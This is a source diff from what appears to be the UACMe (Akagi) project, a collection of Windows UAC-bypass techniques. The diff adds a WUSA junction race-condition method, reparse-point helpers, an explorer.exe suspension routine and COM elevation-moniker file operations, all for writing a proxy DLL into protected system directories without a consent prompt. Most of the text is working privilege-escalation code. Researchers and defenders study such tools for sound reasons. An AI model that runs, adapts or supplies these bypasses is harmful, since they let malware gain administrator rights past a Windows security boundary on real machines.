IShellItem *psiDestDir = NULL;
HRESULT r = E_FAIL;
do {
if ((SubDirectory == NULL) || (ParentDirectory == NULL))
break;
r = CoCreateInstance(&CLSID_FileOperation, NULL,
CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
if (r != S_OK) {
break;
}
if (FileOperation1 != NULL) {
FileOperation1->lpVtbl->Release(FileOperation1);
}
r = ucmMasqueradedCoGetObjectElevate(
T_CLSID_FileOperation,
CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
&IID_IFileOperation,
&FileOperation1);
if (r != S_OK) {
break;
}
if (FileOperation1 == NULL) {
r = E_FAIL;
break;
}
FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
r = SHCreateItemFromParsingName(ParentDirectory, NULL, &IID_IShellItem, &psiDestDir);
if (r != S_OK) {
break;
}
r = FileOperation1->lpVtbl->NewItem(FileOperation1, psiDestDir, FILE_ATTRIBUTE_DIRECTORY, SubDirectory, NULL, NULL);
if (r != S_OK) {
break;
}
r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
if (r != S_OK) {
break;
}
psiDestDir->lpVtbl->Release(psiDestDir);
psiDestDir = NULL;
bResult = TRUE;
} while (bCond);
if (FileOperation1 != NULL) {
FileOperation1->lpVtbl->Release(FileOperation1);
}
if (psiDestDir != NULL) {
psiDestDir->lpVtbl->Release(psiDestDir);
}
return bResult;
}
/*
* ucmMasqueradedMoveCopyFileCOM
*
* Purpose:
*
* Move or Copy file autoelevated.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmMasqueradedMoveCopyFileCOM(
_In_ LPWSTR SourceFileName,
_In_ LPWSTR DestinationDir,
_In_ BOOL fMove
)
{
BOOL cond = FALSE;
IFileOperation *FileOperation1 = NULL;
IShellItem *isrc = NULL, *idst = NULL;
SHELLEXECUTEINFOW shexec;
HRESULT r = E_FAIL;
do {
if ((SourceFileName == NULL) || (DestinationDir == NULL))
break;
RtlSecureZeroMemory(&shexec, sizeof(shexec));
r = CoCreateInstance(&CLSID_FileOperation, NULL,
CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &IID_IFileOperation, &FileOperation1);
if (r != S_OK)
break;
if (FileOperation1 != NULL)
FileOperation1->lpVtbl->Release(FileOperation1);
r = ucmMasqueradedCoGetObjectElevate(
T_CLSID_FileOperation,
CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
&IID_IFileOperation,
&FileOperation1);
if (r != S_OK)
break;
if (FileOperation1 == NULL) {
r = E_FAIL;
break;
}
FileOperation1->lpVtbl->SetOperationFlags(FileOperation1, g_ctx.IFileOperationFlags);
r = SHCreateItemFromParsingName(SourceFileName, NULL, &IID_IShellItem, &isrc);
if (r != S_OK)
break;
r = SHCreateItemFromParsingName(DestinationDir, NULL, &IID_IShellItem, &idst);
if (r != S_OK)
break;
if (fMove)
r = FileOperation1->lpVtbl->MoveItem(FileOperation1, isrc, idst, NULL, NULL);
else
r = FileOperation1->lpVtbl->CopyItem(FileOperation1, isrc, idst, NULL, NULL);
if (r != S_OK)
break;
r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
if (r != S_OK)
break;
idst->lpVtbl->Release(idst);
idst = NULL;
isrc->lpVtbl->Release(isrc);
isrc = NULL;
} while (cond);
if (FileOperation1 != NULL)
FileOperation1->lpVtbl->Release(FileOperation1);
if (isrc != NULL)
isrc->lpVtbl->Release(isrc);
if (idst != NULL)
idst->lpVtbl->Release(idst);
return (SUCCEEDED(r));
}
/*
* ucmMasqueradedMoveFileCOM
*
* Purpose:
*
* Move file autoelevated.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmMasqueradedMoveFileCOM(
_In_ LPWSTR SourceFileName,
_In_ LPWSTR DestinationDir
)
{
return ucmMasqueradedMoveCopyFileCOM(SourceFileName, DestinationDir, TRUE);
}
/*
* ucmStandardAutoElevation2
*
@ -479,40 +202,3 @@ BOOL ucmStandardAutoElevation(
return bResult;
}
/*
* ucmMasqueradedCoGetObjectElevate
*
* Purpose:
*
* CoGetObject elevation as admin.
*
*/
HRESULT ucmMasqueradedCoGetObjectElevate(
_In_ LPWSTR clsid,
_In_ DWORD dwClassContext,
_In_ REFIID riid,
_Outptr_ void **ppv
)
{
HRESULT r = E_FAIL;
BIND_OPTS3 bop;
WCHAR szElevationMoniker[MAX_PATH];
if (clsid == NULL)
return r;
if (_strlen(clsid) > 64)
return r;
RtlSecureZeroMemory(szElevationMoniker, sizeof(szElevationMoniker));
_strcpy(szElevationMoniker, L"Elevation:Administrator!new:");
_strcat(szElevationMoniker, clsid);
RtlSecureZeroMemory(&bop, sizeof(bop));
bop.cbStruct = sizeof(bop);
bop.dwClassContext = dwClassContext;
return CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, riid, ppv);
}

27
Source/Akagi/methods/pitou.h
View File

@ -4,9 +4,9 @@
*
* TITLE: PITOU.H
*
* VERSION: 2.71
* VERSION: 2.74
*
* DATE: 06 May 2017
* DATE: 10 June 2017
*
* Prototypes and definitions for Leo Davidson method.
*
@ -26,26 +26,3 @@ BOOL ucmStandardAutoElevation(
BOOL ucmStandardAutoElevation2(
CONST PVOID ProxyDll,
DWORD ProxyDllSize);
BOOL ucmMasqueradedCreateSubDirectoryCOM(
_In_ LPWSTR ParentDirectory,
_In_ LPWSTR SubDirectory);
BOOL ucmMasqueradedMoveCopyFileCOM(
_In_ LPWSTR SourceFileName,
_In_ LPWSTR DestinationDir,
_In_ BOOL fMove);
BOOL ucmMasqueradedMoveFileCOM(
_In_ LPWSTR SourceFileName,
_In_ LPWSTR DestinationDir);
BOOL ucmMasqueradedRenameElementCOM(
_In_ LPWSTR OldName,
_In_ LPWSTR NewName);
HRESULT ucmMasqueradedCoGetObjectElevate(
_In_ LPWSTR clsid,
_In_ DWORD dwClassContext,
_In_ REFIID riid,
_Outptr_ void **ppv);

9
Source/Akagi/methods/tyranid.c
View File

@ -4,15 +4,18 @@
*
* TITLE: TYRANID.C
*
* VERSION: 2.73
* VERSION: 2.74
*
* DATE: 27 May 2017
* DATE: 11 June 2017
*
* James Forshaw autoelevation method(s)
* Fine Dinning Tool (c) CIA
*
* For description please visit original URL
* https://tyranidslair.blogspot.ru/2017/05/exploiting-environment-variables-in.html
* https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-1.html
* https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-2.html
* https://tyranidslair.blogspot.ru/2017/05/reading-your-way-around-uac-part-3.html
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -192,7 +195,7 @@ BOOL ucmTokenModification(
tml.Label.Sid = pIntegritySid;
Status = NtSetInformationToken(hDupToken, TokenIntegrityLevel, &tml,
sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid));
(ULONG)(sizeof(TOKEN_MANDATORY_LABEL) + RtlLengthSid(pIntegritySid)));
if (!NT_SUCCESS(Status)) {
#ifdef _INT_DEBUG
supDebugPrint(

426
Source/Akagi/methods/wusa.c Normal file
View File

@ -0,0 +1,426 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: WUSA.C
*
* VERSION: 2.74
*
* DATE: 20 June 2017
*
* Windows Update Standalone Installer (WUSA) based routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
#include "makecab.h"
/*
* ucmWusaExtractPackage
*
* Purpose:
*
* Extract cab to protected directory using wusa.
* This routine expect source as ellocnak.msu cab file in the %temp% folder.
*
*/
BOOL ucmWusaExtractPackage(
_In_ LPWSTR lpTargetDirectory
)
{
BOOL bResult = FALSE;
SIZE_T Size;
LPWSTR lpCommandLine = NULL;
WCHAR szMsuFileName[MAX_PATH * 2];
if (lpTargetDirectory == NULL)
return FALSE;
RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
_strcpy(szMsuFileName, g_ctx.szTempDirectory);
_strcat(szMsuFileName, ELLOCNAK_MSU);
Size = ((1 + _strlen(lpTargetDirectory) +
_strlen(szMsuFileName) +
MAX_PATH) * sizeof(WCHAR));
lpCommandLine = (LPWSTR)supHeapAlloc(Size);
if (lpCommandLine) {
_strcpy(lpCommandLine, L"/c wusa ");
_strcat(lpCommandLine, szMsuFileName);
_strcat(lpCommandLine, L" /extract:");
_strcat(lpCommandLine, lpTargetDirectory);
bResult = supRunProcess(CMD_EXE, lpCommandLine);
supHeapFree(lpCommandLine);
}
DeleteFile(szMsuFileName);
return bResult;
}
/*
* ucmCreateCabinetForSingleFile
*
* Purpose:
*
* Build cabinet for usage in methods where required 1 file.
*
*/
BOOL ucmCreateCabinetForSingleFile(
_In_ LPWSTR lpSourceDll,
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
BOOL cond = FALSE, bResult = FALSE;
CABDATA *Cabinet = NULL;
LPWSTR lpFileName;
WCHAR szMsuFileName[MAX_PATH * 2];
if ((ProxyDll == NULL) ||
(ProxyDllSize == 0) ||
(lpSourceDll == NULL)) return bResult;
do {
//drop proxy dll
if (!supWriteBufferToFile(lpSourceDll, ProxyDll, ProxyDllSize)) {
break;
}
//build cabinet
RtlSecureZeroMemory(szMsuFileName, sizeof(szMsuFileName));
_strcpy(szMsuFileName, g_ctx.szTempDirectory);
_strcat(szMsuFileName, ELLOCNAK_MSU);
Cabinet = cabCreate(szMsuFileName);
if (Cabinet == NULL)
break;
lpFileName = _filename(lpSourceDll);
//put file without compression
bResult = cabAddFile(Cabinet, lpSourceDll, lpFileName);
cabClose(Cabinet);
} while (cond);
return bResult;
}
volatile ULONG g_ThreadFinished = 0;
/*
* ucmxInvokeWusaThread
*
* Purpose:
*
* Start wusa and wait a bit.
*
*/
DWORD ucmxInvokeWusaThread(
PVOID Param)
{
SHELLEXECUTEINFO shinfo;
WCHAR szProcess[MAX_PATH * 2];
WCHAR szParameters[MAX_PATH * 3];
UNREFERENCED_PARAMETER(Param);
InterlockedExchange((LONG*)&g_ThreadFinished, 0);
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
_strcpy(szProcess, g_ctx.szSystemDirectory);
_strcat(szProcess, WUSA_EXE);
RtlSecureZeroMemory(szParameters, sizeof(szParameters));
_strcpy(szParameters, TEXT(" /quiet "));
_strcat(szParameters, g_ctx.szTempDirectory);
_strcat(szParameters, ELLOCNAK_MSU);
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS | SEE_MASK_FLAG_NO_UI;
shinfo.lpFile = szProcess;
shinfo.lpParameters = szParameters;
shinfo.nShow = SW_HIDE;
if (ShellExecuteEx(&shinfo)) {
if (WaitForSingleObject(shinfo.hProcess, 1000) == WAIT_TIMEOUT)
TerminateProcess(shinfo.hProcess, 0);
CloseHandle(shinfo.hProcess);
InterlockedExchange((LONG*)&g_ThreadFinished, 1);
}
return 0;
}
/*
* ucmxDirectoryWatchdogThread
*
* Purpose:
*
* Monitor directory creation in system root directory.
* When it happened - set reparse point.
*
*/
DWORD ucmxDirectoryWatchdogThread(
PVOID Param)
{
BOOL bCond = FALSE, bResult = FALSE;
NTSTATUS status;
HANDLE hDirectory = NULL, hReparseDirectory = NULL, hEvent = NULL;
IO_STATUS_BLOCK IoStatusBlock;
OBJECT_ATTRIBUTES ObjectAttributes;
LPWSTR lpTargetDirectory = (LPWSTR)Param;
PVOID Buffer = NULL;
SIZE_T memIO = 0;
FILE_NOTIFY_INFORMATION *pInfo = NULL;
LPWSTR CapturedDirectoryName = NULL, lpEnd = NULL;
WCHAR szBuffer[MAX_PATH + 1];
UNICODE_STRING usTargetDirectory, usWatchDirectory, usReparseDirectory;
do {
//
// Convert target directory path to native form.
//
usTargetDirectory.Buffer = NULL;
if (!RtlDosPathNameToNtPathName_U(lpTargetDirectory, &usTargetDirectory, NULL, NULL))
break;
//
// Convert watch directory path to native form.
//
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
szBuffer[0] = L'\\';
szBuffer[1] = L'?';
szBuffer[2] = L'?';
szBuffer[3] = L'\\';
_strncpy(&szBuffer[4], MAX_PATH, g_ctx.szSystemDirectory, 3);
//
// Open directory for change notification.
//
usWatchDirectory.Buffer = NULL;
RtlInitUnicodeString(&usWatchDirectory, szBuffer);
InitializeObjectAttributes(&ObjectAttributes, &usWatchDirectory, OBJ_CASE_INSENSITIVE, 0, NULL);
status = NtCreateFile(&hDirectory,
FILE_LIST_DIRECTORY | SYNCHRONIZE,
&ObjectAttributes,
&IoStatusBlock,
NULL,
FILE_OPEN_FOR_BACKUP_INTENT,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
FILE_OPEN,
FILE_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0);
if (!NT_SUCCESS(status))
break;
memIO = 1024 * 1024;
Buffer = supHeapAlloc(memIO);
if (Buffer == NULL)
break;
InitializeObjectAttributes(&ObjectAttributes, NULL, 0, 0, NULL);
status = NtCreateEvent(&hEvent, EVENT_ALL_ACCESS, &ObjectAttributes, NotificationEvent, FALSE);
if (!NT_SUCCESS(status))
break;
//
// Watch for directory changes.
//
do {
status = NtNotifyChangeDirectoryFile(hDirectory, hEvent, NULL, NULL,
&IoStatusBlock, Buffer, (ULONG)memIO, FILE_NOTIFY_CHANGE_DIR_NAME, TRUE);
if (status == STATUS_PENDING)
NtWaitForSingleObject(hEvent, TRUE, NULL);
NtSetEvent(hEvent, NULL);
pInfo = (FILE_NOTIFY_INFORMATION*)Buffer;
for (;;) {
if (pInfo->Action == FILE_ACTION_ADDED) {
memIO = pInfo->FileNameLength +
((1 + _strlen(szBuffer)) * sizeof(WCHAR));
CapturedDirectoryName = supHeapAlloc(memIO);
if (CapturedDirectoryName) {
_strcpy(CapturedDirectoryName, szBuffer);
lpEnd = _strend(CapturedDirectoryName);
RtlCopyMemory(lpEnd, pInfo->FileName, pInfo->FileNameLength);
//
// Open new directory to set reparse point.
//
usReparseDirectory.Buffer = NULL;
RtlInitUnicodeString(&usReparseDirectory, CapturedDirectoryName);
InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = NtCreateFile(&hReparseDirectory,
FILE_ALL_ACCESS,
&ObjectAttributes,
&IoStatusBlock,
NULL,
0,
FILE_SHARE_READ | FILE_SHARE_WRITE,
FILE_OPEN,
FILE_OPEN_REPARSE_POINT | FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0);
if (NT_SUCCESS(status)) {
//
// Set reparse point.
//
bResult = supSetMountPoint(hReparseDirectory,
usTargetDirectory.Buffer,
lpTargetDirectory);
}
status = STATUS_NO_SECRETS;
}
} //Action
if (status == STATUS_NO_SECRETS)
break;
pInfo = (FILE_NOTIFY_INFORMATION*)(((LPBYTE)pInfo) + pInfo->NextEntryOffset);
if (pInfo->NextEntryOffset == 0)
break;
}
} while (NT_SUCCESS(status));
} while (bCond);
//
// Cleanup.
//
if (hEvent)
NtClose(hEvent);
if (hDirectory != NULL)
NtClose(hDirectory);
if (usTargetDirectory.Buffer)
RtlFreeUnicodeString(&usTargetDirectory);
if (Buffer != NULL)
supHeapFree(Buffer);
//
// Remove reparse point.
//
if (CapturedDirectoryName) {
while (g_ThreadFinished != 1)
Sleep(100);
if (hReparseDirectory) {
supDeleteMountPoint(hReparseDirectory);
NtClose(hReparseDirectory);
}
RtlInitUnicodeString(&usReparseDirectory, CapturedDirectoryName);
InitializeObjectAttributes(&ObjectAttributes, &usReparseDirectory, OBJ_CASE_INSENSITIVE, NULL, NULL);
NtDeleteFile(&ObjectAttributes);
supHeapFree(CapturedDirectoryName);
}
return (DWORD)bResult;
}
/*
* ucmWusaExtractViaJunction
*
* Purpose:
*
* Extract cab contents to the specified directory by initializing wusa race condition.
* This routine expect source as ellocnak.msu cab file in the %temp% folder.
*
*/
BOOL ucmWusaExtractViaJunction(
_In_ LPWSTR lpTargetDirectory
)
{
BOOL bCond = FALSE;
#ifndef _DEBUG
HANDLE hExplorer = NULL;
#endif
HANDLE hWatchdogThread, hWusaThread;
DWORD ti;
//
// Query explorer.exe handle and use it to suspend process.
// Thus blocking unwanted user changes during work.
//
#ifndef _DEBUG
hExplorer = supGetExplorerHandle();
if (hExplorer != NULL) {
NtSuspendProcess(hExplorer);
}
#endif
do {
//
// Run watchdog thread.
//
hWatchdogThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxDirectoryWatchdogThread, lpTargetDirectory, 0, &ti);
if (hWatchdogThread == NULL)
break;
//
// Run wusa in separate thread.
//
hWusaThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ucmxInvokeWusaThread, NULL, 0, &ti);
if (hWusaThread) {
if (WaitForSingleObject(hWusaThread, 5000) == WAIT_TIMEOUT)
TerminateThread(hWusaThread, 0);
CloseHandle(hWusaThread);
}
if (WaitForSingleObject(hWatchdogThread, 10000) == WAIT_TIMEOUT)
TerminateThread(hWatchdogThread, 0);
CloseHandle(hWatchdogThread);
} while (bCond);
#ifndef _DEBUG
if (hExplorer != NULL) {
NtResumeProcess(hExplorer);
NtClose(hExplorer);
}
#endif
return (g_ThreadFinished == 1);
}

30
Source/Akagi/methods/wusa.h Normal file
View File

@ -0,0 +1,30 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: WUSA.H
*
* VERSION: 2.74
*
* DATE: 20 June 2017
*
* Prototypes and definitions for Windows Update Standalone Installer (WUSA) based methods.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
BOOL ucmWusaExtractPackage(
_In_ LPWSTR lpTargetDirectory);
BOOL ucmCreateCabinetForSingleFile(
_In_ LPWSTR lpSourceDll,
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);
BOOL ucmWusaExtractViaJunction(
_In_ LPWSTR lpTargetDirectory);

163
Source/Akagi/sup.c
View File

@ -4,9 +4,9 @@
*
* TITLE: SUP.C
*
* VERSION: 2.72
* VERSION: 2.74
*
* DATE: 26 May 2017
* DATE: 20 June 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -109,6 +109,32 @@ BOOL supGetElevationType(
return (NT_SUCCESS(status));
}
/*
* supGetExplorerHandle
*
* Purpose:
*
* Returns Explorer process handle opened with maximum allowed rights or NULL on error.
*
*/
HANDLE supGetExplorerHandle(
VOID
)
{
HWND hTrayWnd = NULL;
DWORD dwProcessId = 0;
hTrayWnd = FindWindow(TEXT("Shell_TrayWnd"), NULL);
if (hTrayWnd == NULL)
return NULL;
GetWindowThreadProcessId(hTrayWnd, &dwProcessId);
if (dwProcessId == 0)
return NULL;
return OpenProcess(MAXIMUM_ALLOWED, FALSE, dwProcessId);
}
/*
* supWriteBufferToFile
*
@ -312,7 +338,7 @@ BOOL supRunProcess2(
)
{
BOOL bResult;
SHELLEXECUTEINFOW shinfo;
SHELLEXECUTEINFO shinfo;
RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
if (lpszProcessName == NULL)
@ -324,7 +350,7 @@ BOOL supRunProcess2(
shinfo.lpParameters = lpszParameters;
shinfo.lpDirectory = NULL;
shinfo.nShow = SW_SHOW;
bResult = ShellExecuteExW(&shinfo);
bResult = ShellExecuteEx(&shinfo);
if (bResult) {
if (fWait)
WaitForSingleObject(shinfo.hProcess, 0x8000);
@ -852,7 +878,7 @@ DWORD supExpandEnvironmentStrings(
&Length
);
if (NT_SUCCESS(Status) || Status == STATUS_BUFFER_TOO_SMALL) {
return(Length / sizeof(WCHAR));
return (DWORD)(Length / sizeof(WCHAR));
}
else {
RtlSetLastWin32Error(RtlNtStatusToDosError(Status));
@ -1122,3 +1148,130 @@ BOOL supSetEnvVariable(
return bResult;
}
/*
* supDeleteMountPoint
*
* Purpose:
*
* Removes reparse point of type mount_point from directory.
*
*/
BOOL supDeleteMountPoint(
_In_ HANDLE hDirectory
)
{
NTSTATUS status;
IO_STATUS_BLOCK IoStatusBlock;
REPARSE_GUID_DATA_BUFFER Buffer;
RtlSecureZeroMemory(&Buffer, sizeof(REPARSE_GUID_DATA_BUFFER));
Buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
status = NtFsControlFile(hDirectory,
NULL,
NULL,
NULL,
&IoStatusBlock,
FSCTL_DELETE_REPARSE_POINT,
&Buffer,
REPARSE_GUID_DATA_BUFFER_HEADER_SIZE,
NULL,
0);
if (status == STATUS_NOT_A_REPARSE_POINT) {
SetLastError(ERROR_INVALID_PARAMETER);
}
else {
SetLastError(RtlNtStatusToDosError(status));
}
return NT_SUCCESS(status);
}
/*
* supSetMountPoint
*
* Purpose:
*
* Install reparse point of type mount_point to directory.
*
*/
BOOL supSetMountPoint(
_In_ HANDLE hDirectory,
_In_ LPWSTR lpTarget,
_In_ LPWSTR lpPrintName
)
{
ULONG memIO;
USHORT cbTarget, cbPrintName, reparseDataLength;
NTSTATUS status;
IO_STATUS_BLOCK IoStatusBlock;
REPARSE_DATA_BUFFER *Buffer;
if ((lpTarget == NULL) || (lpPrintName == NULL)) {
SetLastError(ERROR_INVALID_PARAMETER);
return FALSE;
}
//
// Calculate required buffer size.
// Header + length of input strings + safe space.
//
cbTarget = (USHORT)(_strlen(lpTarget) * sizeof(WCHAR));
cbPrintName = (USHORT)(_strlen(lpPrintName) * sizeof(WCHAR));
reparseDataLength = cbTarget + cbPrintName + 12;
memIO = (ULONG)(reparseDataLength + REPARSE_DATA_BUFFER_HEADER_LENGTH);
Buffer = supHeapAlloc((SIZE_T)memIO);
if (Buffer == NULL)
return FALSE;
//
// Setup reparse point structure.
//
Buffer->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
Buffer->ReparseDataLength = reparseDataLength;
//
// Add Target to PathBuffer.
//
Buffer->MountPointReparseBuffer.SubstituteNameOffset = 0;
Buffer->MountPointReparseBuffer.SubstituteNameLength = cbTarget;
RtlCopyMemory(Buffer->MountPointReparseBuffer.PathBuffer,
lpTarget,
cbTarget);
//
// Add PrintName to PathBuffer.
//
Buffer->MountPointReparseBuffer.PrintNameOffset = cbTarget + sizeof(UNICODE_NULL);
Buffer->MountPointReparseBuffer.PrintNameLength = cbPrintName;
RtlCopyMemory(&Buffer->MountPointReparseBuffer.PathBuffer[(cbTarget / sizeof(WCHAR)) + 1],
lpPrintName,
cbPrintName);
//
// Set reparse point.
//
status = NtFsControlFile(hDirectory,
NULL,
NULL,
NULL,
&IoStatusBlock,
FSCTL_SET_REPARSE_POINT,
Buffer,
memIO,
NULL,
0);
supHeapFree(Buffer);
SetLastError(RtlNtStatusToDosError(status));
return NT_SUCCESS(status);
}

44
Source/Akagi/sup.h
View File

@ -4,9 +4,9 @@
*
* TITLE: SUP.H
*
* VERSION: 2.72
* VERSION: 2.74
*
* DATE: 26 May 2017
* DATE: 11 June 2017
*
* Common header file for the program support routines.
*
@ -28,12 +28,44 @@ typedef struct _SXS_SEARCH_CONTEXT {
LPWSTR FullDllPath;
} SXS_SEARCH_CONTEXT, *PSXS_SEARCH_CONTEXT;
//ntifs.h
typedef struct _REPARSE_DATA_BUFFER {
ULONG ReparseTag;
USHORT ReparseDataLength;
USHORT Reserved;
union {
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
ULONG Flags;
WCHAR PathBuffer[1];
} SymbolicLinkReparseBuffer;
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
WCHAR PathBuffer[1];
} MountPointReparseBuffer;
struct {
UCHAR DataBuffer[1];
} GenericReparseBuffer;
} DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, *PREPARSE_DATA_BUFFER;
#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)
BOOLEAN supIsProcess32bit(
_In_ HANDLE hProcess);
BOOL supGetElevationType(
TOKEN_ELEVATION_TYPE *lpType);
HANDLE supGetExplorerHandle(
VOID);
BOOL supWriteBufferToFile(
_In_ LPWSTR lpFileName,
_In_ PVOID Buffer,
@ -133,4 +165,12 @@ BOOL supSetEnvVariable(
_In_ LPWSTR lpVariableName,
_In_opt_ LPWSTR lpVariableData);
BOOL supSetMountPoint(
_In_ HANDLE hDirectory,
_In_ LPWSTR lpTarget,
_In_ LPWSTR lpPrintName);
BOOL supDeleteMountPoint(
_In_ HANDLE hDirectory);
#define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1)

4
Source/Akagi/tests/test.c
View File

@ -4,9 +4,9 @@
*
* TITLE: TEST.C
*
* VERSION: 2.72
* VERSION: 2.74
*
* DATE: 26 May 2017
* DATE: 11 June 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED

4
Source/Akagi/uacme.vcxproj
View File

@ -390,11 +390,13 @@
<ClCompile Include="methods\explife.c" />
<ClCompile Include="methods\gootkit.c" />
<ClCompile Include="methods\hybrids.c" />
<ClCompile Include="methods\comfileop.c" />
<ClCompile Include="methods\methods.c" />
<ClCompile Include="methods\pitou.c" />
<ClCompile Include="methods\sandworm.c" />
<ClCompile Include="methods\simda.c" />
<ClCompile Include="methods\tyranid.c" />
<ClCompile Include="methods\wusa.c" />
<ClCompile Include="sup.c" />
<ClCompile Include="tests\test.c" />
<ClCompile Include="windefend.c" />
@ -412,6 +414,7 @@
<ClInclude Include="methods\apphelp.h" />
<ClInclude Include="methods\carberp.h" />
<ClInclude Include="methods\comet.h" />
<ClInclude Include="methods\comfileop.h" />
<ClInclude Include="methods\enigma0x3.h" />
<ClInclude Include="methods\explife.h" />
<ClInclude Include="methods\gootkit.h" />
@ -422,6 +425,7 @@
<ClInclude Include="methods\simda.h" />
<ClInclude Include="methods\sirefef.h" />
<ClInclude Include="methods\tyranid.h" />
<ClInclude Include="methods\wusa.h" />
<ClInclude Include="resource.h" />
<ClInclude Include="sup.h" />
<ClInclude Include="tests\test.h" />

12
Source/Akagi/uacme.vcxproj.filters
View File

@ -129,6 +129,12 @@
<ClCompile Include="methods\tyranid.c">
<Filter>Source Files\methods</Filter>
</ClCompile>
<ClCompile Include="methods\comfileop.c">
<Filter>Source Files\methods</Filter>
</ClCompile>
<ClCompile Include="methods\wusa.c">
<Filter>Source Files\methods</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="global.h">
@ -209,6 +215,12 @@
<ClInclude Include="methods\tyranid.h">
<Filter>Header Files\methods</Filter>
</ClInclude>
<ClInclude Include="methods\comfileop.h">
<Filter>Header Files\methods</Filter>
</ClInclude>
<ClInclude Include="methods\wusa.h">
<Filter>Header Files\methods</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="Resource.rc">

4
Source/Akagi/uacme.vcxproj.user
View File

@ -17,11 +17,11 @@
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>36</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>36</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>

18
Source/Akatsuki/dllmain.c
View File

@ -4,9 +4,9 @@
*
* TITLE: DLLMAIN.C
*
* VERSION: 2.70
* VERSION: 2.74
*
* DATE: 22 Mar 2017
* DATE: 20 June 2017
*
* Proxy dll entry point, Akatsuki.
* Special dll for wow64 logger method.
@ -147,9 +147,12 @@ BOOL ucmQueryCustomParameter(
RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
RtlSecureZeroMemory(&processInfo, sizeof(processInfo));
startupInfo.cb = sizeof(startupInfo);
GetStartupInfoW(&startupInfo);
GetStartupInfo(&startupInfo);
bResult = CreateProcessW(NULL, lpParameter, NULL, NULL, FALSE, 0, NULL,
startupInfo.dwFlags = STARTF_USESHOWWINDOW;
startupInfo.wShowWindow = SW_SHOW;
bResult = CreateProcess(NULL, lpParameter, NULL, NULL, FALSE, 0, NULL,
NULL, &startupInfo, &processInfo);
if (bResult) {
@ -251,7 +254,7 @@ BOOL WINAPI DllMain(
